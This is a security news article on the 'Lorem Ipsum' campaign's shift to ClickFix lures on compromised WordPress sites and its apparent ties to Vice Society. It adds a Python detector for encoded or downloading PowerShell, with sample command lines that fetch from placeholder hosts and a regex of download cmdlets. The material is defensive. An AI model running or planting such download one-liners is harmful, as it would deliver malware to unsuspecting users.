A malware campaign known informally as "Lorem Ipsum" — named for the Latin placeholder text used in its social engineering lures — has evolved its delivery methodology, pivoting to ClickFix-style attacks distributed through a network of compromised WordPress sites, according to new analysis published Monday.
The campaign's infrastructure and techniques bear similarities to those associated with Vice Society, a ransomware and data extortion group known for targeting education, healthcare, and other sectors. While attribution remains preliminary, researchers say the overlaps are significant enough to warrant the connection.
What Is the Lorem Ipsum Campaign?
The Lorem Ipsum campaign is a threat actor operation that uses social engineering lures — often featuring placeholder-style text designed to prompt victims into taking a specific action — to deliver malware payloads. What sets this campaign apart is its frequent reuse of compromised legitimate websites, particularly WordPress installations, as staging grounds for payload delivery and victim redirection.
The campaign has historically relied on multiple delivery methods, but the latest iteration shows a deliberate pivot toward ClickFix as its primary infection vector.
ClickFix: The New Delivery Method
ClickFix is a social engineering technique that has seen explosive adoption among threat actors in 2026. The attack typically proceeds as follows:
- A victim visits a compromised or malicious website
- A pop-up or overlay appears, typically impersonating a browser error, CAPTCHA verification, or software update prompt
- The user is instructed to click a button labeled something like "Fix," "Verify," or "Update"
- Clicking copies a malicious command (often a PowerShell one-liner) to the clipboard
- The victim is then instructed to open the Windows Run dialog (Win+R) and paste the command
- The pasted command executes, downloading and running a malware payload
The technique is effective precisely because it hijacks legitimate user actions — running a command from the Run dialog is something technically proficient users do regularly. The social engineering prompt is designed to make the action feel routine rather than suspicious.
In the Lorem Ipsum campaign, attackers are injecting ClickFix overlays into compromised WordPress sites, leveraging the large installed base of WordPress to reach a broad pool of potential victims.
Vice Society Connection
Researchers noted several technical and operational similarities between the Lorem Ipsum campaign infrastructure and known Vice Society activity:
- Similar C2 infrastructure patterns — Overlapping IP ranges and domain registration patterns
- Targeting profile — The victim industries align with Vice Society's historical focus areas
- Post-exploitation tooling — File encryption and data exfiltration tools observed in Lorem Ipsum infections share code characteristics with Vice Society-affiliated malware
Vice Society has historically operated as both a ransomware group and a data extortion actor — encrypting victim files and threatening to publish stolen data if ransoms go unpaid. The group is known for targeting organizations with limited cybersecurity resources, particularly in the education and healthcare sectors.
If the Vice Society attribution is confirmed, it would indicate the group is actively updating its initial access playbook to incorporate trending social engineering techniques, a pattern consistent with how sophisticated ransomware groups adapt to evolving defenses.
WordPress as an Attack Enabler
The campaign's use of compromised WordPress sites as delivery infrastructure underscores a persistent threat to the WordPress ecosystem. WordPress-powered sites are frequently targeted for compromise and used as:
- Phishing and payload hosting — Trusted domains that are less likely to be blocked by web filters
- Redirect chains — Passing traffic through multiple legitimate-looking domains before reaching the malicious payload
- ClickFix injection points — Injecting malicious JavaScript overlays into legitimate page content
Site owners running outdated WordPress installations, themes, or plugins remain particularly vulnerable to compromise. Once a site is infected, it may be used in campaigns for extended periods without the site owner's awareness.
Indicators and Defense
Organizations should watch for the following indicators associated with ClickFix-style campaigns:
- Unexpected pop-up overlays on visited websites prompting clipboard interaction or Run dialog usage
- PowerShell one-liners appearing in clipboard after visiting unfamiliar sites
- Outbound connections to newly registered or suspicious domains following browsing activity
- Unusual process spawning from explorer.exe or cmd.exe involving PowerShell with encoded or downloaded commands
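The last indicator in this list can be checked mechanically against process-creation telemetry. The following Python is an added example, not code from the published analysis; the event field names, sample command lines and example.invalid hosts are constructed for illustration.

```python
import base64
import re

# Indicator from the list above: PowerShell spawned by explorer.exe or cmd.exe.
SUSPECT_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Any "-e..." switch plus its argument; checked against -EncodedCommand below.
FLAG_RE = re.compile(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)")
DOWNLOAD_RE = re.compile(r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                         r"downloadstring|downloadfile|start-bitstransfer)\b")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, '' if unreadable, None if absent."""
    for m in FLAG_RE.finditer(cmdline):
        flag = m.group(1).lower()
        # PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...) and -ec.
        if "encodedcommand".startswith(flag) or flag == "ec":
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or bad UTF-16: still an encoded launch
                return ""
    return None

def assess(event):
    """Return the reasons a process-creation event matches the indicator, or []."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    if image not in POWERSHELL or parent not in SUSPECT_PARENTS:
        return []
    reasons, text = [], event["command_line"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded-command")
        text += " " + decoded  # also scan the decoded script for downloads
    if DOWNLOAD_RE.search(text):
        reasons.append("download")
    return reasons

# Constructed sample events (field names are assumptions, not a real log schema).
B64_SAMPLE = base64.b64encode("irm https://cdn.example.invalid/a".encode("utf-16-le")).decode()
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLES = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "command_line": 'powershell -w hidden -c "iwr https://cdn.example.invalid/fix.txt"'},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "command_line": "powershell -NoP -enc " + B64_SAMPLE},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": PS_PATH,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]
```

The third sample is a routine script launch that shares the parent/child pair but carries neither an encoded command nor a download, so it is not flagged.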
Defensive recommendations:
- Disable clipboard-based attack vectors where possible — Group Policy can restrict the Windows Run dialog in managed environments
- Deploy script execution controls — PowerShell Constrained Language Mode, AppLocker, or Windows Defender Application Control
- WordPress hardening — Keep WordPress core, themes, and all plugins updated; enable file integrity monitoring
- User awareness training — Educate users that legitimate websites never require them to manually run commands to fix errors
- Web filtering — Block newly registered domains and enforce safe browsing policies
Key Takeaways
- The Lorem Ipsum campaign has pivoted to ClickFix delivery via compromised WordPress sites
- The campaign shows potential links to Vice Society, a known ransomware and extortion group
- ClickFix attacks are highly effective because they leverage victim action rather than exploiting technical vulnerabilities
- WordPress site owners should audit for compromise and ensure all components are updated
- Users should be trained to recognize ClickFix lures — no legitimate site asks you to run clipboard commands to fix errors